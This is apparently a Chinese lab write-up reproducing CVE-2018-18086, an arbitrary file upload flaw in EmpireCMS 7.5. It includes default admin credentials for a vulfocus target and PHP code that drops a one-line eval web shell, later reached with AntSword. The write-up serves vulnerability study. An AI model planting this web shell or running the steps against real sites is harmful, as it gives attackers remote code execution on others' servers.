1.1漏洞描述
描述: EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS)。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。可利用该漏洞上传任意文件。
| 漏洞编号 | CVE-2018-18086 |
| 漏洞类型 | 文件上传 |
| 漏洞危害 | 高危 |
| 环境搭建 | vulfocus |
1.2漏洞等级
高危
1.3影响版本
EmpireCMS 7.5
1.4漏洞复现
1.4.1.基础环境
| 靶场 | VULFOCUS |
| 工具 | BurpSuite |
1.4.2.前提
-
网站后台地址:/empirecms/e/admin/index.php
-
后台管理账密:admin : 123456
-
后台登录地址 :http://10.9.47.6:52480/empirecms/e/admin/index.php
1.进入后台
2.导入新的模块
3.上传一句话木马,因为mod后缀,需要用到文件包含
一句话木马源码
<?php
file_put_contents("shell.php","<?php @eval(\$_POST[cmd]); ?>");
?>4,获得上传代码路径:
http://10.9.47.6:61589/empirecms/e/admin/shell.php
5.中国蚁剑连接
1.5深度利用
1.5.1GetShell
1.6漏洞挖掘
1.6.1指纹信息
1.7修复建议
-
升级
-
打补丁
-
上设备
